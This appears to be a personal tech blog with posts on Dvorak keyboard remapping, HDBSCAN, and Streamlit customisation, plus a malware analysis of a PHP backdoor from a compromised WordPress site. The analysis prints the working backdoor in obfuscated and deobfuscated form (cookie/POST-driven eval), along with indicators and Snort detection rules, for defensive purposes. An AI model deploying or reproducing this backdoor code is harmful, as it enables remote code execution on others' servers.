Remapping the GPD Pocket 3 keyboard for Dvorak using XKB

If you’re used to the Dvorak keyboard layout, you might have a hard time using the GPD Pocket 3. On a standard QWERTY keyboard the ; key sits to the right of the L. On the Pocket 3, GPD moved it to the right of the spacebar. In the Dvorak layout that position holds the letter s, so a very frequently used letter is no longer on the home row, which largely defeats the purpose of Dvorak.

This was done on Ubuntu 24.04. Your experience on other Linux distributions might vary.

I found the following remapping quite easy to get used to:

  • Enter becomes the letter S
  • Backspace is the new Enter
  • Delete is now Backspace
  • Shift + Delete performs the Delete action

(Although not related to the GPD Pocket 3 specifically I also remapped Caps Lock to Control.)

Note that these changes are applied on top of simply switching to the Dvorak layout:

[Figure: Original layout]

[Figure: Changes on top of setting the layout to Dvorak]

In practice this results in the following changes to the config file /usr/share/X11/xkb/symbols/pc.

--- pc.bak	2024-05-14 08:04:51.859190653 +0200
+++ pc	2024-05-14 08:54:16.902085341 +0200
@@ -4,11 +4,11 @@
 
     key  <ESC> {[  Escape  ]};
     key  <TAB> {[  Tab,  ISO_Left_Tab  ]};
-    key <CAPS> {[  Caps_Lock  ]};
+    key <CAPS> {[  Control_R  ]};
 
-    key <BKSP> {[  BackSpace,  BackSpace  ]};
+    key <BKSP> {[  Return  ]};
     key <BKSL> {[  backslash,  bar  ]};
-    key <RTRN> {[  Return  ]};
+    key <RTRN> {[  s, S  ]};
 
     // The extra key on many European keyboards:
     key <LSGT> {[  less,  greater,    bar,  brokenbar  ]};
@@ -59,7 +59,7 @@
     key <PAUS> {[  Pause,  Break  ], type="PC_CONTROL_LEVEL2" };
 
     key  <INS> {[  Insert  ]};
-    key <DELE> {[  Delete  ]};
+    key <DELE> {[  BackSpace, Delete  ]};
     key <HOME> {[  Home    ]};
     key  <END> {[  End     ]};
     key <PGUP> {[  Prior   ]};

Note that this configuration only takes effect in X. The remap does not apply elsewhere, for example when booting and unlocking the full disk encryption.

The configuration change also does not survive some updates, so you might need to restore it from time to time.
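Because the change has to be restored from time to time, it can help to script it. The following is only a minimal sketch, assuming the key definitions in your copy of the file look like the ones in the diff above. The names REMAP and apply_remap are made up for this example, and the function only transforms text: reading the file and writing it back (as root, after making a backup) is left to you.

```python
import re

# Key name -> new symbol list, copied from the diff above.
REMAP = {
    "CAPS": "Control_R",
    "BKSP": "Return",
    "RTRN": "s, S",
    "DELE": "BackSpace, Delete",
}


def apply_remap(symbols_text: str) -> str:
    """Return the symbols file contents with the remapped keys substituted."""
    for key, symbols in REMAP.items():
        # Matches lines such as:    key <CAPS> {[  Caps_Lock  ]};
        pattern = re.compile(
            rf"^(\s*key\s+<{key}>\s*)\{{\[.*?\]\}};", re.MULTILINE
        )
        symbols_text = pattern.sub(rf"\g<1>{{[  {symbols}  ]}};", symbols_text)
    return symbols_text


sample = (
    "    key <CAPS> {[  Caps_Lock  ]};\n"
    "    key <BKSL> {[  backslash,  bar  ]};\n"
    "    key <DELE> {[  Delete  ]};\n"
)
patched = apply_remap(sample)
```

Running apply_remap on an already patched file leaves it unchanged, so it should be safe to run after every update.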

It might be better to achieve the same results with xmodmap. I have not yet done this successfully though. If my current solution of modifying the XKB config gives problems, I might try xmodmap next.

Sneakily giving HDBSCAN a predict method

Most common implementations of the HDBSCAN clustering algorithm don’t have a predict method. There are some fundamental reasons that many implementations don’t have it. These reasons mostly boil down to the following: Introducing a new data point might change the clustering.

But depending on your use case, it can be valid to want or need a predict method anyway. For example, you could be using scikit-learn pipelines, which need a predict method on the final step before the pipeline itself can predict. Or you might be sure that the samples you want to cluster look a lot like your training data. Maybe the samples you offer to the predict method are even drawn from the data you fitted the clusterer on.

For all those use cases the maintainers of the hdbscan package provide the approximate_predict function. We could expose its functionality through a predict method on the HDBSCAN class. Because not all implementations have a comparable function, I’ll assume here that the hdbscan package is being used.

The code below shows how to monkey patch a predict method on an instance of HDBSCAN:

from hdbscan import HDBSCAN
from hdbscan.prediction import approximate_predict
from sklearn.datasets import make_blobs

# Generate some sample data to cluster
blobs, _ = make_blobs(
    n_samples=750,
    centers=[[1, 1], [-1, -1], [1.5, -1.5]],
    cluster_std=[0.4, 0.1, 0.75],
    random_state=0,
)

# Instantiate HDBSCAN with prediction_data=True so approximate_predict will work
clusterer = HDBSCAN(prediction_data=True)

# Monkey patch the approximate_predict method as predict method on the instance
clusterer.predict = lambda x: approximate_predict(clusterer, x)[0]

# Now the predict method is available
fitted = list(clusterer.fit_predict(blobs))
predicted = list(clusterer.predict(blobs))
assert fitted == predicted

Alternatively, you could subclass the HDBSCAN class. Since scikit-learn does not accept varargs for init methods of estimators, this gets verbose:

from hdbscan import HDBSCAN
from hdbscan.prediction import approximate_predict
from joblib import Memory


class HDBSCANWithPredict(HDBSCAN):

    def __init__(self,
                 min_cluster_size=5,
                 min_samples=None,
                 cluster_selection_epsilon=0.0,
                 max_cluster_size=0,
                 metric="euclidean",
                 alpha=1.0,
                 p=None,
                 algorithm="best",
                 leaf_size=40,
                 memory=Memory(None, verbose=0),
                 approx_min_span_tree=True,
                 gen_min_span_tree=False,
                 core_dist_n_jobs=4,
                 cluster_selection_method="eom",
                 allow_single_cluster=False,
                 prediction_data=True,  # changed from the reference implementation
                 match_reference_implementation=False,
                 **kwargs):
        super().__init__(min_cluster_size=min_cluster_size,
                         min_samples=min_samples,
                         cluster_selection_epsilon=cluster_selection_epsilon,
                         max_cluster_size=max_cluster_size,
                         metric=metric,
                         alpha=alpha,
                         p=p,
                         algorithm=algorithm,
                         leaf_size=leaf_size,
                         memory=memory,
                         approx_min_span_tree=approx_min_span_tree,
                         gen_min_span_tree=gen_min_span_tree,
                         core_dist_n_jobs=core_dist_n_jobs,
                         cluster_selection_method=cluster_selection_method,
                         allow_single_cluster=allow_single_cluster,
                         prediction_data=prediction_data,
                         match_reference_implementation=match_reference_implementation,
                         **kwargs)

    def predict(self, points_to_predict):
        return approximate_predict(self, points_to_predict=points_to_predict)[0]

Whether you choose the monkey-patching or the subclassing approach, you now have a predict method available.

Even though inference is now possible for new points, it’s best to keep monitoring the performance of this clusterer. Out-of-cluster samples can be recognised by a label of -1. A dead giveaway that your trained clusterer is no longer appropriate is when the fraction of out-of-cluster samples is:

  • a lot higher than in the training set
  • rising over time because of changing data

If the inference is no longer acceptable you should re-fit HDBSCAN.
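The monitoring described above could be sketched as follows. This is an illustration rather than part of the hdbscan package: noise_fraction, needs_refit and the tolerance of 0.10 are names and values I made up, and the right threshold depends on your data.

```python
def noise_fraction(labels):
    """Fraction of samples labelled -1 (out-of-cluster)."""
    labels = list(labels)
    if not labels:
        return 0.0
    return sum(1 for label in labels if label == -1) / len(labels)


def needs_refit(train_labels, new_labels, tolerance=0.10):
    """True when the noise fraction rose by more than `tolerance`.

    `tolerance` is a hypothetical threshold, not a recommended value.
    """
    return noise_fraction(new_labels) - noise_fraction(train_labels) > tolerance


train_labels = [0, 0, 1, -1]      # 25% noise while fitting
recent_labels = [-1, -1, 0, 1]    # 50% noise during inference
refit = needs_refit(train_labels, recent_labels)
```

Calling this on batches of recent predictions and tracking the result over time covers both signals from the list above.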

Adding custom HTML and Javascript to Streamlit

Streamlit has an API to add custom HTML to your document, but the added HTML will be nested in an iframe. Since the policies on this iframe are quite relaxed, you can use window.parent to escape to the parent document. This can be useful if you want access to elements on the top-level DOM.

Using the following code, the HTML added will lift itself out of its containing iframe:

from streamlit.components.v1 import html

html_contents = """
<script id="extractorScript">
    let currentScript = document.getElementById('extractorScript');
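    // insertAdjacentElement needs a position and an element (not a whitespace text node)
    window.parent.document.querySelector('iframe').insertAdjacentElement('afterend', currentScript.nextElementSibling);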
    // window.parent.document.querySelector('iframe').remove();
</script>
<div>
    <h1>Test contents</h1>
    <p>The HTML contents that you want to move out of its iframe</p>
</div>
"""

html(html_contents)

Placing the script tag directly before your HTML element (a div in this case) lets the script find the content that needs to be lifted as its next sibling.

If you’re planning to use this code snippet more than one time, you will have multiple iframe elements. In that case it’s wise to come up with a more specific CSS selector than 'iframe'.
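One way to avoid the selector problem altogether is sketched below. It assumes the iframe is same-origin with the parent document, so that window.frameElement (a standard DOM property) returns the hosting iframe instead of null. I have not verified this against every Streamlit version. build_extractor_html is a hypothetical helper name, and each call generates its own script id so several snippets can coexist.

```python
from uuid import uuid4


def build_extractor_html(inner_html: str) -> str:
    """Wrap inner_html in a div that moves itself next to its own iframe."""
    script_id = f"extractor-{uuid4().hex}"
    return f"""
<script id="{script_id}">
    // window.frameElement is the iframe hosting this document
    // (null when the frame is cross-origin, in which case nothing moves)
    const script = document.getElementById('{script_id}');
    const frame = window.frameElement;
    if (frame !== null) {{
        frame.insertAdjacentElement('afterend', script.nextElementSibling);
    }}
</script>
<div>{inner_html}</div>
"""


html_a = build_extractor_html("<p>First block</p>")
html_b = build_extractor_html("<p>Second block</p>")
```

Each result can be passed to the html function from streamlit.components.v1 in the same way as html_contents above.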

Adding a custom Tornado handler to a streamlit project

Streamlit uses the Tornado web framework under the hood. All traffic generated by Streamlit originates from Tornado handlers.

Streamlit doesn’t expose much of the Tornado API. In this post I’ll show how you can use it anyway, to add custom handlers, while still enjoying most of the conveniences provided by Streamlit.

The usual streamlit run startup is replaced by code that starts the Tornado server itself. I build on my experiences from this previous post: Adding “a main” to a streamlit dashboard

By subclassing Streamlit’s default Server class, we can modify the routes just before we start the Tornado application. After running the typical setup (Server._create_app()), we add a new routing rule. Since this is appended to the end, and the rule before is set so it matches everything, we need to reverse the order the rules are checked. First the newly added specific rule should be checked, and only after that the default Streamlit routes.

import asyncio

import streamlit.web.bootstrap
from streamlit import config
from streamlit.web.server import Server
from streamlit.web.server.media_file_handler import MediaFileHandler
from streamlit.web.server.server import start_listening
from streamlit.web.server.server_util import make_url_path_regex


streamlit.markdown("# Contents of the streamlit app go here as usual")


class CustomHandler(MediaFileHandler):
    def get_content(self, abspath, start=None, end=None):
        # Implement a custom handler here
        return b''


class CustomServer(Server):
    async def start(self):
        # Override the start of the Tornado server, so we can add custom handlers
        app = self._create_app()

        # Add a new handler
        app.default_router.add_rules([(
                make_url_path_regex(config.get_option("server.baseUrlPath"),
                                    "custom/(.*)"),
                CustomHandler,
                {"path": ""},
            ),
        ])

        # Our new rules go before the rule matching everything, reverse the list
        app.default_router.rules = list(reversed(app.default_router.rules))

        start_listening(app)
        await self._runtime.start()


if __name__ == '__main__':
    if '__streamlitmagic__' not in locals():
        # Code adapted from bootstrap.py in streamlit
        streamlit.web.bootstrap._fix_sys_path(__file__)
        streamlit.web.bootstrap._fix_tornado_crash()
        streamlit.web.bootstrap._fix_sys_argv(__file__, [])
        streamlit.web.bootstrap._fix_pydeck_mapbox_api_warning()
        streamlit.web.bootstrap._fix_pydantic_duplicate_validators_error()
        streamlit.web.bootstrap._install_pages_watcher(__file__)

        server = CustomServer(__file__, is_hello=False)

        async def run_server():
            await server.start()
            streamlit.web.bootstrap._on_server_start(server)
            streamlit.web.bootstrap._set_up_signal_handler(server)
            await server.stopped

        asyncio.run(run_server())
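To see why the order of the rules matters, here is a deliberately simplified model of first-match routing. It uses plain tuples and regular expressions rather than Tornado's actual router classes, and the handler names and the /healthz path are placeholders.

```python
import re


def first_match(rules, path):
    """Return the handler of the first rule whose pattern matches the path."""
    for pattern, handler in rules:
        if re.fullmatch(pattern, path):
            return handler
    return None


# Stand-in for the default router: a single rule that matches everything.
rules = [(r".*", "streamlit_routes")]

# Appending puts the specific rule behind the catch-all, so it never fires.
rules.append((r"/custom/(.*)", "custom_handler"))
shadowed = first_match(rules, "/custom/report.csv")

# After reversing, the specific rule is checked first.
reordered = list(reversed(rules))
routed = first_match(reordered, "/custom/report.csv")
fallback = first_match(reordered, "/healthz")
```

In this model the appended rule is shadowed until the list is reversed, while all other paths still fall through to the catch-all rule.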

There’s also a way to replace the default Streamlit routes. In a next post I’ll show how to do that, to prevent unauthorized access to the media assets served by your app.

Looking at PHP backdoor malware

Last week I helped out with a WordPress website that had been infected. The webhosting company detected some malware, but there was more malware that wasn’t detected yet. In this post I’m looking at that malware sample. This PHP file was probably uploaded using a vulnerability in a WordPress plugin.

The malicious code looked like this:

<?php


function asdasd0()
{
	echo 11111;
}

$i="Hq8%01%28ao%2A%2C%1D%3D%3E%07%2B%3CA%7F%09%17%18%2A%01%0B%0D%1B%29oEx%220%26%09Zol%7E%0E%21%0713%16%0F1%5Bs%0D%1B%29%17%0C%2A%1E%0A%186TxADgsdR%2C%0C%04%2C%2C%27%04%00fo%049%14%3A%0F%3D%167%14%00%27%27%07%07%18%0C%07+TxADgsdR%2C%16%0F1%2C+%08%19%2B%17%051%01%0C%1EmC%7DZyDEcUf%03%1F%2B%10+%08%1B+h%1A0%08%15Ba%175%15%15bhM3%09%1CCHy%2Fl%7EnhIxH%0A%1F1%2C0%00%00%2FhTxNGQHytATn.%06%2ALMN%2CSiADuhM1LYJ6%07%26%0D%11+%60M%3C%0D%11%0BlH%7DA%0FCBIxLEJeSt%07%1B%3ChA%7C%06EWeCoAP%24hUx%1F%11%18%29%16%3AIP%25-%10qLCLeW%3DAHn%3B%1D%2A%00%00%04mW0%00%00%2FaRxH%0FAn_tE%1Dec%40x%17h%60eStATnhIxLEJa%1C%21%15%2B%2A%29%1D9LKWe%10%3C%13%5C%21%3A%0DpH%01%0B1%12%0FE%1D%13aI%06L%0A%18%21%5Bp%0A%117%13M21LC%7E%7E%5EATnhIxLE%17HytATn5dRLEJe%011%15%01%3C%26I%7C%03%10%1E%1A%175%15%15uEc%25ao%03%23S%7C%08%07%3D-%1DpH%3A-%00%27%0FWC%7D%7CZm1LCHy%2Fl%7EnhIx%08%0C%0Fm%1E0T%5Cz%7F%5Ei%5ELC%7E%7E%5E%1CyDl%1D%3D%01%15W%24%01%26%00%0D%11%25%0C%2A%0B%00Ba%2C%17.%3B%05%01%2CtLA5%15%3C%075%5DuEc%3E%03%17%0F%24%10%3CA%5Cj%3C%0C5%1CE%0B6Sp%05%15%3A%2963%09%1CJxMtE%10%2F%3C%08qL%1EgOStATj%2C%08%2C%0DEWe3%21%0F%07%2B%3A%009%00%0C%10+%5B%27%09%10%3E%60%1A0%08%15B%27%12%27%04Bz%17%0D%3D%0F%0A%0E+%5Bp%05%15%3A%29%40tLB%106GfQ%1A%2A%3D%07%3D%5B%02%1A%2BB%3C%16%03%28%2F%03%3E%5D%11%10pA%3C%0A%12%29%24%04%2CZBCiSp%05%15%3A%2963%09%1CClHYkTnhI1%0AEB%2C%00%27%04%00fl%0D9%18%041b%12%3FF%29gaI%23aoJeStATnh%00%3ELMN%21%12+%00%2Fi%29N%05LXWeT%3DF%5Dn3dRLEJeStATnhIxH%0CJxS5%13%06%2F1AUfEJeStATnhIxLEJeSs%11%02ihTfL%25%1A-%03%22%04%06%3D%21%066DLFHytATnhIxLEJeStATno%1A.KEW%7BSsPZ%7EeX%7F%40h%60eStATnhIxLEJlHYkTnhIxLEJeStA%11-+%06x%2C%16%0F7%1A5%0D%1D4-A%7C%05LQHytATnhIxL%18J+%1F%27%04%1D%28hA%7C%08%04%1E%24%28s%00S%13hTeLB%0FbZt%1AyDhIxLEJeStATn-%1F9%00MN%21%12+%00%2Fi%2CN%05E%5EgOStATnhIx%11h%60eStATnhI%3D%14%0C%1EmZol%7EnhIx%11h%608";
$j="%12%27%24%0C%07%1C%10%1E%1A%10%3B%0F%00%2B%26%1D%2B";

$eByjoghUea="tNHiXlejEsTa";

function vksXJAdk($Vsgjyqji, $unvnBFtDiJlf)
{
$Vsgjyqji = urldecode($Vsgjyqji);
$TTlBSYU = str_split($Vsgjyqji);
$action = "";
for ($i = 0; $i < strlen($Vsgjyqji);$i++) {
$action .= $TTlBSYU[$i] ^ $unvnBFtDiJlf[$i%12];
}
return $action;
}

$k = vksXJAdk($i, $eByjoghUea);

function asdasd1()
{
	echo 11111;
}


$f = vksXJAdk($j, $eByjoghUea);
$f($eByjoghUea, $k);

function asdasd2()
{
	echo 11111;
}

include_once ($eByjoghUea);

function asdasd3()
{
	echo 11111;
}

unlink($eByjoghUea);

function asdasd4()
{
	echo 11111;
}

exit();

There’s clearly some obfuscation going on. The asdasd functions don’t have a role in the obfuscation. I suspect they are there to decrease the entropy of the file as a whole. This helps avoid detection, since scanning software uses high entropy as an indication that some obfuscation, compression or encryption is being used.

After deobfuscation (running it and setting a breakpoint to inspect the contents of $k), the code looked like this:

<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);


function shdp($data, $key)
{
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}
if (isset($_GET[673435]))
{
    die(md5(47712));
}
$temp=array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
    $data = @unserialize(shdp(shdp(base64_decode($data), 'zs420ndune7gpn1hwwfgjf1tz52hkfglmt6'), $data_key));
    if (isset($data['ak'])) {
        if ($data['a'] == 'i') {
            $i = array(
                'pv' => @phpversion(),
                'sv' => '1.0-1',
            );
            echo @serialize($i);
        } elseif ($data['a'] == 'e') {
            eval($data['d']);
        }
        exit();
    }
}

This code gets executed by writing it to a file, running that file with include_once, and deleting it afterwards with unlink. $f decodes to the string file_put_contents, which does the writing. The XOR key in $eByjoghUea doubles as the file name.
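The decoding can also be done statically, without executing the sample. The sketch below mirrors the vksXJAdk function in Python. xor_decode is my own name for it, and the + handling is there because PHP's urldecode turns + into a space.

```python
from urllib.parse import unquote_to_bytes


def xor_decode(encoded: str, key: str) -> bytes:
    """URL-decode `encoded` and XOR it with the repeating `key`."""
    data = unquote_to_bytes(encoded.replace("+", " "))
    key_bytes = key.encode("latin-1")
    return bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))


key = "tNHiXlejEsTa"
j = "%12%27%24%0C%07%1C%10%1E%1A%10%3B%0F%00%2B%26%1D%2B"
function_name = xor_decode(j, key)  # b"file_put_contents"
```

Passing the long string in $i through the same function should yield the deobfuscated PHP shown above.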

Reading this code, we can find a few Indicators Of Compromise (IOC):

  • 673435 is used as a GET parameter. The value is ignored. (Other variations use 47712 as a GET parameter.)
  • 6a59bb58c6c03d5103d44f3b7e5ebf07, the MD5 hash of 47712, is the response when this GET parameter is supplied.
  • Base64-encoded cookie or POST data is supplied to the script. Note that there are also many legitimate use cases for doing this, which makes it easier to blend in with normal traffic. In addition, cookie values and POST data are less likely to end up in access logs (unlike GET parameters), which also helps evade detection.

Of course there’s nothing preventing the attacker from changing the constant 673435 (again). My best guess is that this GET parameter can be used to demonstrate a host is compromised. Speculating a bit: this could allow for selling access to the host to others, because this check could be done without knowing the password. The buyer of the access could verify that a URL like https://example.com/wp-content/uploads/malware.php?673435=anything returns 6a59bb58c6c03d5103d44f3b7e5ebf07, before paying for the access.

Only with the password (zs420ndune7gpn1hwwfgjf1tz52hkfglmt6 in this sample) can the host be used to evaluate arbitrary code. The password varies across the many samples I looked at. It is most likely unique per target. The password is used to decrypt the instructions (that are supplied either in cookies or in POST data). The encryption used is a repeating XOR cipher.

After the data has been demangled, it can contain two instructions. The type of instruction is encoded in the a key.

  • i: return information about the host (backdoor version (1.0-1) and PHP version)
  • e: evaluates PHP code (the code itself is in the d key)
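For analysing captured traffic, the demangling step can be reproduced in Python. This is a sketch of the shdp and base64 layers only; it stops at the PHP-serialized bytes and does not unserialize them. The function names, the cookie name "sess" and the example payload are made up, and mangle exists purely to build test input.

```python
import base64
from itertools import cycle


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """Python counterpart of shdp: XOR data with the key, repeated as needed."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def demangle(value: str, field_name: str, password: str) -> bytes:
    """Undo base64, then XOR with the password and with the field name."""
    raw = base64.b64decode(value)
    return repeating_xor(repeating_xor(raw, password.encode()), field_name.encode())


def mangle(plain: bytes, field_name: str, password: str) -> str:
    """Inverse of demangle, used here only to create an example value."""
    xored = repeating_xor(repeating_xor(plain, field_name.encode()), password.encode())
    return base64.b64encode(xored).decode("ascii")


password = "zs420ndune7gpn1hwwfgjf1tz52hkfglmt6"
payload = b'a:2:{s:2:"ak";i:1;s:1:"a";s:1:"i";}'  # hypothetical "i" instruction
cookie_value = mangle(payload, "sess", password)
recovered = demangle(cookie_value, "sess", password)
```

Because XOR is its own inverse, the same two passes both encrypt and decrypt, which is why knowing the password is enough to issue instructions.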

I was curious whether more about this malware was known, so I started looking for earlier detections. I found this StackExchange post from 2018 where someone posts some similar malware with the i and e commands.

Searching GitHub led me to a useful resource on this strain of PHP malware, the repository bediger4000/php-malware-analysis. This repository contained many different variations collected by WordPress honeypots, going by the following aliases:

Since the two numeric GET parameters can be turned into Snort rules, I decided to submit these to the snort-sigs mailing list:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 47712"; flow:to_server,established; content:"GET /"; http_uri; content:"47712="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000001;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 673435"; flow:to_server,established; content:"GET /"; http_uri; content:"673435="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000002;)

alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg:"SERVER-WEBAPP Indication of a successful PHP backdoor check, server responds with 6a59bb58c6c03d5103d44f3b7e5ebf07"; flow:to_client,established; content:"6a59bb58c6c03d5103d44f3b7e5ebf07"; http_client_body; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000003;)

To decrease false positives, you could for example require that .php is in the path. An even better way to decrease false positives would be only raising an alert when rule 1 or 2 and rule 3 are activated. Snort’s activates and activated_by offer this functionality. This could be useful if you are monitoring an application where 673435 and 47712 are legitimate GET parameters, or the MD5 hash of 47712 is a valid server response.
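The same combination of checks can be sketched outside Snort, for example when going through recorded requests and responses. This is not a translation of the rules above, just an illustration of the logic; the function names are my own.

```python
from urllib.parse import parse_qs, urlsplit

IOC_PARAMS = {"673435", "47712"}
IOC_RESPONSE = "6a59bb58c6c03d5103d44f3b7e5ebf07"


def is_backdoor_probe(request_target: str) -> bool:
    """True for a request to a .php path carrying one of the IOC parameters."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(".php"):
        return False
    # keep_blank_values: the backdoor ignores the value, so it may be empty
    params = parse_qs(parts.query, keep_blank_values=True)
    return any(name in IOC_PARAMS for name in params)


def is_confirmed_compromise(request_target: str, response_body: str) -> bool:
    """Only flag when both the probe and the hash in the response are seen."""
    return is_backdoor_probe(request_target) and IOC_RESPONSE in response_body


probe = "/wp-content/uploads/malware.php?673435=anything"
confirmed = is_confirmed_compromise(probe, IOC_RESPONSE)
```

Requiring both conditions means a legitimate page that happens to use one of these parameter names is not flagged on its own.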

Update: The PHP backdoor signatures have been improved and are now part of the Open Emerging Threats rules, available for download here